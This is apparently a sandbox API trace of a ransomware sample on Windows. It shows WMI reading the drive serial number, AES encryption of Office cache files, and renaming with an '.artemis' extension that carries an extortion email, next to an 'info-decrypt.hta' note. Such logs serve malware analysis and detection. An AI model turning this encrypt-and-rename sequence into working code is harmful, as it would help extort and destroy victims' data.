WbemLocator:IUnknown:QueryInterface (in: This=0x781bf4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddfd8 | out: ppvObject=0x69ddfd8*=0x781b54) returned 0x0 [0175.239] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781b54, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddfe0 | out: pCid=0x69ddfe0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0175.239] WbemLocator:IUnknown:Release (This=0x781b54) returned 0x3 [0175.239] CoGetContextToken (in: pToken=0x69de038 | out: pToken=0x69de038) returned 0x0 [0175.239] CoGetContextToken (in: pToken=0x69de440 | out: pToken=0x69de440) returned 0x0 [0175.239] WbemLocator:IUnknown:QueryInterface (in: This=0x781bf4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4d0 | out: ppvObject=0x69de4d0*=0x781bdc) returned 0x0 [0175.240] WbemLocator:IRpcOptions:Query (in: This=0x781bdc, pPrx=0x781bf4, dwProperty=2, pdwValue=0x69de4f8 | out: pdwValue=0x69de4f8) returned 0x80004002 [0175.240] WbemLocator:IUnknown:Release (This=0x781bdc) returned 0x3 [0175.240] WbemLocator:IUnknown:Release (This=0x781bf4) returned 0x2 [0175.240] CoGetContextToken (in: pToken=0x69dea18 | out: pToken=0x69dea18) returned 0x0 [0175.240] CoGetContextToken (in: pToken=0x69de978 | out: pToken=0x69de978) returned 0x0 [0175.240] WbemLocator:IUnknown:QueryInterface (in: This=0x781bf4, riid=0x69dea48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x69dea44 | out: ppvObject=0x69dea44*=0x6747fa4) returned 0x0 [0175.240] WbemLocator:IUnknown:AddRef (This=0x6747fa4) returned 0x4 [0175.240] WbemLocator:IUnknown:Release (This=0x6747fa4) returned 0x3 [0175.240] WbemLocator:IUnknown:Release (This=0x6747fa4) returned 0x2 [0175.240] SysStringLen (param_1=0x0) returned 0x0 [0175.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733e30, puCount=0x69deddc | out: puCount=0x69deddc*=0x0) returned 0x0 [0175.240] WbemDefPath:IWbemPath:GetText (in: This=0x6733e30, lFlags=2, puBuffLength=0x69dedd8*=0x0, pszText=0x0 | out: puBuffLength=0x69dedd8*=0x20, pszText=0x0) returned 0x0 [0175.240] WbemDefPath:IWbemPath:GetText (in: This=0x6733e30, lFlags=2, puBuffLength=0x69dedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0175.240] CoGetContextToken (in: pToken=0x69dea48 | out: pToken=0x69dea48) returned 0x0 [0175.240] WbemLocator:IUnknown:AddRef (This=0x781bf4) returned 0x3 [0175.240] WbemLocator:IUnknown:QueryInterface (in: This=0x781bf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de8dc | out: ppvObject=0x69de8dc*=0x781bf4) returned 0x0 [0175.240] WbemLocator:IUnknown:Release (This=0x781bf4) returned 0x3 [0175.240] WbemLocator:IUnknown:Release (This=0x781bf4) returned 0x2 [0175.240] WbemDefPath:IWbemPath:GetText (in: This=0x6733e30, lFlags=2, puBuffLength=0x69dede0*=0x0, pszText=0x0 | out: puBuffLength=0x69dede0*=0x20, pszText=0x0) returned 0x0 [0175.240] WbemDefPath:IWbemPath:GetText (in: This=0x6733e30, lFlags=2, puBuffLength=0x69dede0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0175.240] IWbemServices:GetObject (in: This=0x6747fa4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x69ded94*=0x0, ppCallResult=0x0 | out: ppObject=0x69ded94*=0x673bf90, ppCallResult=0x0) returned 0x0 [0177.388] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733ea0, puCount=0x69ded94 | out: puCount=0x69ded94*=0x2) returned 0x0 [0177.388] WbemDefPath:IWbemPath:GetText (in: This=0x6733ea0, lFlags=4, puBuffLength=0x69ded90*=0x0, pszText=0x0 | out: puBuffLength=0x69ded90*=0xf, pszText=0x0) returned 0x0 [0177.388] WbemDefPath:IWbemPath:GetText (in: This=0x6733ea0, lFlags=4, puBuffLength=0x69ded90*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded90*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0177.388] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x391d188*=0, plFlavor=0x391d18c*=0 | out: pVal=0x69ded90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x391d188*=8, plFlavor=0x391d18c*=0) returned 0x0 [0177.389] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.389] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.389] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x391d188*=8, plFlavor=0x391d18c*=0 | out: pVal=0x69ded98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x391d188*=8, plFlavor=0x391d18c*=0) returned 0x0 [0177.389] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.389] SysStringByteLen (bstr="9C354B42") returned 0x10 [0177.389] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0177.389] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x75 [0177.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dedf8) returned 1 [0177.389] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), fInfoLevelId=0x0, lpFileInformation=0x69dee74 | out: lpFileInformation=0x69dee74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf493420, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x102fed0)) returned 1 [0177.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dedf4) returned 1 [0177.390] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0177.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0177.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x69dea34, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0177.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0177.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee9c) returned 1 [0177.392] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x69def18 | out: lpFileInformation=0x69def18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe2af0c0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe2af0c0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe393900, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0177.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee98) returned 1 [0177.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x69de9b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0177.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee64) returned 1 [0177.392] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x391da50 | out: lpFileInformation=0x391da50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00)) returned 1 [0177.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee60) returned 1 [0177.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x69de8a4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0177.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded98) returned 1 [0177.393] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0177.393] GetFileType (hFile=0x598) returned 0x1 [0177.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded94) returned 1 [0177.393] GetFileType (hFile=0x598) returned 0x1 [0177.393] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x69deea0 | out: lpFileSizeHigh=0x69deea0*=0x0) returned 0x263e00 [0186.612] ReadFile (in: hFile=0x598, lpBuffer=0x43794d0, nNumberOfBytesToRead=0x263e00, lpNumberOfBytesRead=0x69dee4c, lpOverlapped=0x0 | out: lpBuffer=0x43794d0*, lpNumberOfBytesRead=0x69dee4c*=0x263e00, lpOverlapped=0x0) returned 1 [0189.519] CloseHandle (hObject=0x598) returned 1 [0189.692] CryptAcquireContextW (in: phProv=0x69dedec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x69dedec*=0x7aa168) returned 1 [0189.694] CryptGenRandom (in: hProv=0x7aa168, dwLen=0x10, pbBuffer=0x33d587c | out: pbBuffer=0x33d587c) returned 1 [0190.641] CryptImportKey (in: hProv=0x7aa168, pbData=0x34f2d88, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x69dedbc | out: phKey=0x69dedbc*=0x77af30) returned 1 [0190.642] CryptContextAddRef (hProv=0x7aa168, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.642] CryptContextAddRef (hProv=0x7aa168, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.642] CryptDuplicateKey (in: hKey=0x77af30, pdwReserved=0x0, dwFlags=0x0, phKey=0x69dedac | out: phKey=0x69dedac*=0x77b2b0) returned 1 [0190.642] CryptContextAddRef (hProv=0x7aa168, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.642] CryptSetKeyParam (hKey=0x77b2b0, dwParam=0x4, pbData=0x34f2e68*=0x1, dwFlags=0x0) returned 1 [0190.642] CryptSetKeyParam (hKey=0x77b2b0, dwParam=0x1, pbData=0x34f2e34, dwFlags=0x0) returned 1 [0190.663] CryptEncrypt (in: hKey=0x77b2b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4889ed0*, pdwDataLen=0x69dee18*=0x263e10, dwBufLen=0x263e10 | out: pbData=0x4889ed0*, pdwDataLen=0x69dee18*=0x263e10) returned 1 [0190.815] CryptEncrypt (in: hKey=0x77b2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34f2e90*, pdwDataLen=0x69dee20*=0x0, dwBufLen=0x10 | out: pbData=0x34f2e90*, pdwDataLen=0x69dee20*=0x10) returned 1 [0191.442] CryptDestroyKey (hKey=0x77af30) returned 1 [0191.442] CryptReleaseContext (hProv=0x7aa168, dwFlags=0x0) returned 1 [0191.442] CryptReleaseContext (hProv=0x7aa168, dwFlags=0x0) returned 1 [0191.442] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x69de890, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0191.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded84) returned 1 [0191.442] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x59c [0191.443] GetFileType (hFile=0x59c) returned 0x1 [0191.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded80) returned 1 [0191.443] GetFileType (hFile=0x59c) returned 0x1 [0191.443] WriteFile (in: hFile=0x59c, lpBuffer=0x50ade20*, nNumberOfBytesToWrite=0x264020, lpNumberOfBytesWritten=0x69dee40, lpOverlapped=0x0 | out: lpBuffer=0x50ade20*, lpNumberOfBytesWritten=0x69dee40*=0x264020, lpOverlapped=0x0) returned 1 [0191.639] CloseHandle (hObject=0x59c) returned 1 [0192.161] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0192.161] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0192.161] CoTaskMemFree (pv=0x9825530) [0192.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x69de878, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0192.162] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69dedc0 | out: ppv=0x69dedc0*=0x72015c) returned 0x0 [0192.162] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69dedb8 | out: pAptType=0x69dedb8*=1) returned 0x0 [0192.162] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69dedbc | out: ppvObject=0x69dedbc*=0x0) returned 0x80004002 [0192.162] IUnknown:Release (This=0x72015c) returned 0x1 [0192.163] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de728 | out: ppv=0x69de728*=0x6737098) returned 0x0 [0192.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737098, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de940 | out: ppvObject=0x69de940*=0x0) returned 0x80004002 [0192.163] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737098, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de954 | out: ppvObject=0x69de954*=0x6738690) returned 0x0 [0192.163] WbemDefPath:IUnknown:Release (This=0x6737098) returned 0x0 [0192.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de574 | out: ppvObject=0x69de574*=0x6738690) returned 0x0 [0192.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de530 | out: ppvObject=0x69de530*=0x0) returned 0x80004002 [0192.163] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0192.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dde8c | out: ppvObject=0x69dde8c*=0x0) returned 0x80004002 [0192.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69dde3c | out: ppvObject=0x69dde3c*=0x0) returned 0x80004002 [0192.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69dde48 | out: ppvObject=0x69dde48*=0x7ae520) returned 0x0 [0192.164] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae520, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69dde50 | out: pCid=0x69dde50*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0192.164] WbemDefPath:IUnknown:Release (This=0x7ae520) returned 0x3 [0192.164] CoGetContextToken (in: pToken=0x69ddea8 | out: pToken=0x69ddea8) returned 0x0 [0192.164] CoGetContextToken (in: pToken=0x69de2b0 | out: pToken=0x69de2b0) returned 0x0 [0192.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de340 | out: ppvObject=0x69de340*=0x0) returned 0x80004002 [0192.164] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0192.164] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0192.164] CoGetContextToken (in: pToken=0x69dec38 | out: pToken=0x69dec38) returned 0x0 [0192.164] CoGetContextToken (in: pToken=0x69deb98 | out: pToken=0x69deb98) returned 0x0 [0192.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738690, riid=0x69dec68*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69dec64 | out: ppvObject=0x69dec64*=0x6738690) returned 0x0 [0192.164] WbemDefPath:IUnknown:AddRef (This=0x6738690) returned 0x3 [0192.164] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x2 [0192.164] WbemDefPath:IWbemPath:SetText (This=0x6738690, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x69dede8*=0x0, pszText=0x0 | out: puBuffLength=0x69dede8*=0x20, pszText=0x0) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x69dede8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738690, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x69ded6c | out: puCount=0x69ded6c*=0x0) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x69ded58 | out: puCount=0x69ded58*=0x2) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0x0, pszText=0x0 | out: puBuffLength=0x69ded54*=0xf, pszText=0x0) returned 0x0 [0192.164] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded54*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0192.164] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded08 | out: ppv=0x69ded08*=0x72015c) returned 0x0 [0192.164] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded00 | out: pAptType=0x69ded00*=1) returned 0x0 [0192.165] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded04 | out: ppvObject=0x69ded04*=0x0) returned 0x80004002 [0192.165] IUnknown:Release (This=0x72015c) returned 0x1 [0192.165] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de670 | out: ppv=0x69de670*=0x6736e68) returned 0x0 [0192.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de888 | out: ppvObject=0x69de888*=0x0) returned 0x80004002 [0192.166] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e68, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de89c | out: ppvObject=0x69de89c*=0x6738bd0) returned 0x0 [0192.166] WbemDefPath:IUnknown:Release (This=0x6736e68) returned 0x0 [0192.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, 